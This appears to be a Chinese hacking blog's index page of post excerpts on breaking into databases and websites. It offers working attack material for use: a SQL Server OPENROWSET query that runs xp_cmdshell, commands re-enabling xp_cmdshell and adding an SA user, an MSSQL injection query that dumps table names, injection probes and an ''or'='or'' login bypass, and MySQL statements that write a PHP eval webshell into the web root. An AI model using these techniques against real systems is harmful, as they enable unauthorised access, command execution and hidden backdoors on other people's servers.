摘要:
有时候会遇到SA权限不能多句执行的情况,让人很蛋疼。前几天在搞一个SQL SERVER 7.0的PUBLIC权限时。某牛给我以下语句提权select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:''')本机测试成功。但实际环境中却出现[微软] [ODBC SQL Server驱动] [SQL Server中] OLE DB提 阅读全文
摘要:
~STEP 1~ 把以下文字复制到记事本里[ExtShellFolderViews] {BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC} [{BE098140-A513-11D0-A3A4-00C04FD706EC}] Attributes=1 IconArea_Image=a.jpg [.ShellClassInfo] ConfirmFileOp=0 ~STEP 2~ 把记事本文件另存为 desktop.ini ~STEP 3~把刚保存的 desktop.ini 复制到U盘根目录下 ~ST 阅读全文
摘要:
平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句,有兴趣的朋友可以试试,类似MYSQL的group_concat !效果还是不错的!测试1:SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1测试2:create table dirs(paths varchar(100),pa 阅读全文
摘要:
sql2005恢复xp_cmdshell恢复:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;关闭:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;零、----------------- 添加SA用户-------- 阅读全文
摘要:
【入侵】网站入侵思路(初级黑客渗透篇)[i=s] 本帖最后由 冷月星辰 于 2010-7-16 10:15 编辑 [/i]网站入侵思路(初级黑客渗透篇) 1,〓经典注入〓 通常,判断一个网站是否存在注入点,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断,如果and 1=1正常返回页面,1=2错误,或者找不到,那么就存在注入点 2,〓万能密码OR漏洞〓 万能密码'or'='or',可以用在后台管理输入,有的网站由于没有过滤OR漏洞,输入OR直接就可以突破,一般漏洞存在于AS 阅读全文
摘要:
文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd]);?>'); //把一句话木马插入到temp表Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查 阅读全文